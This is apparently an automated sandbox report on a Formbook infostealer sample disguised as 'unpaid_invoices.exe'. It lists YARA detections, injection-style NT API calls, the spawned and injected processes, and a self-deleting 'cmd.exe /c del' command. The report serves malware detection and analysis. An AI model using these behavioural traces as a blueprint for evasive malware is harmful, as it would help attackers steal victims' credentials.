          Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: initial sample, Static PE information: Filename: unpaid_invoices.exe
          Source: unpaid_invoices.exe, Static file information: Suspicious name
          Source: unpaid_invoices.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: String function: 00E145A9 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: String function: 00E12410 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A310 NtCreateFile,2_2_0041A310
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A3C0 NtReadFile,2_2_0041A3C0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A440 NtClose,2_2_0041A440
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A4F0 NtAllocateVirtualMemory,2_2_0041A4F0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A368 NtReadFile,2_2_0041A368
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A30A NtCreateFile,2_2_0041A30A
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A43A NtClose,2_2_0041A43A
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A4EA NtAllocateVirtualMemory,2_2_0041A4EA
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09840 NtDelayExecution,LdrInitializeThunk,17_2_04C09840
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09860 NtQuerySystemInformation,LdrInitializeThunk,17_2_04C09860
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C095D0 NtClose,LdrInitializeThunk,17_2_04C095D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C099A0 NtCreateSection,LdrInitializeThunk,17_2_04C099A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09540 NtReadFile,LdrInitializeThunk,17_2_04C09540
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_04C09910
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C096D0 NtCreateKey,LdrInitializeThunk,17_2_04C096D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C096E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_04C096E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09650 NtQueryValueKey,LdrInitializeThunk,17_2_04C09650
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A50 NtCreateFile,LdrInitializeThunk,17_2_04C09A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_04C09660
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09FE0 NtCreateMutant,LdrInitializeThunk,17_2_04C09FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09780 NtMapViewOfSection,LdrInitializeThunk,17_2_04C09780
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09710 NtQueryInformationToken,LdrInitializeThunk,17_2_04C09710
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C098F0 NtReadVirtualMemory,17_2_04C098F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C098A0 NtWriteVirtualMemory,17_2_04C098A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0B040 NtSuspendThread,17_2_04C0B040
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09820 NtEnumerateKey,17_2_04C09820
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C099D0 NtCreateProcessEx,17_2_04C099D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C095F0 NtQueryInformationFile,17_2_04C095F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09950 NtQueueApcThread,17_2_04C09950
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09560 NtWriteFile,17_2_04C09560
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09520 NtWaitForSingleObject,17_2_04C09520
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0AD30 NtSetContextThread,17_2_04C0AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A80 NtOpenDirectoryObject,17_2_04C09A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09670 NtQueryInformationProcess,17_2_04C09670
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A00 NtProtectVirtualMemory,17_2_04C09A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09610 NtEnumerateValueKey,17_2_04C09610
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A10 NtQuerySection,17_2_04C09A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A20 NtResumeThread,17_2_04C09A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C097A0 NtUnmapViewOfSection,17_2_04C097A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0A3B0 NtGetContextThread,17_2_04C0A3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09760 NtOpenProcess,17_2_04C09760
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09770 NtSetInformationFile,17_2_04C09770
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0A770 NtOpenThread,17_2_04C0A770
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09B00 NtSetValueKey,17_2_04C09B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0A710 NtOpenProcessToken,17_2_04C0A710
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09730 NtQueryVirtualMemory,17_2_04C09730
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA3C0 NtReadFile,17_2_02EFA3C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA310 NtCreateFile,17_2_02EFA310
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA4F0 NtAllocateVirtualMemory,17_2_02EFA4F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA440 NtClose,17_2_02EFA440
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA368 NtReadFile,17_2_02EFA368
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA30A NtCreateFile,17_2_02EFA30A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA4EA NtAllocateVirtualMemory,17_2_02EFA4EA
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA43A NtClose,17_2_02EFA43A
          Source: unpaid_invoices.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\unpaid_invoices.exeFile read: C:\Users\user\Desktop\unpaid_invoices.exe
          Source: unpaid_invoices.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\unpaid_invoices.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\unpaid_invoices.exe "C:\Users\user\Desktop\unpaid_invoices.exe"
          Source: C:\Users\user\Desktop\unpaid_invoices.exeProcess created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeProcess created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\ronkhfyq.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Users\user\Desktop\unpaid_invoices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000019.db
          Source: C:\Users\user\Desktop\unpaid_invoices.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7CF9.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@0/0
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\unpaid_invoices.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404ABB
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCommand line argument: nF1_2_00E145C0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCommand line argument: nF2_2_00E145C0
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: unpaid_invoices.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: ronkhfyq.exe, 00000001.00000003.234061206.000000001A710000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000001.00000003.237833298.000000001A8A0000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.239686577.0000000000E36000.00000004.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303340292.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303914689.00000000010EF000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.238238247.0000000000B9E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.303050048.0000000003204000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.304479870.0000000004A09000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: ronkhfyq.exe, 00000002.00000002.303244940.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303149130.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ronkhfyq.exe, 00000001.00000003.234061206.000000001A710000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000001.00000003.237833298.000000001A8A0000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.239686577.0000000000E36000.00000004.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303340292.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303914689.00000000010EF000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.238238247.0000000000B9E000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.303050048.0000000003204000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.304479870.0000000004A09000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\yysuo\kzzcum\izya\0db06ea2233046af83ff72ba291e1f8f\exvtus\fxibtxmq\Release\fxibtxmq.pdb source: unpaid_invoices.exe, 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmp, ronkhfyq.exe, 00000001.00000000.229638861.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, ronkhfyq.exe, 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, ronkhfyq.exe, 00000002.00000000.235483979.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, control.exe, 00000011.00000002.499584872.000000000311A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000011.00000002.500336053.00000000050D7000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.462569690.0000000007497000.00000004.80000000.00040000.00000000.sdmp, nss7D29.tmp.0.dr, ronkhfyq.exe.0.dr
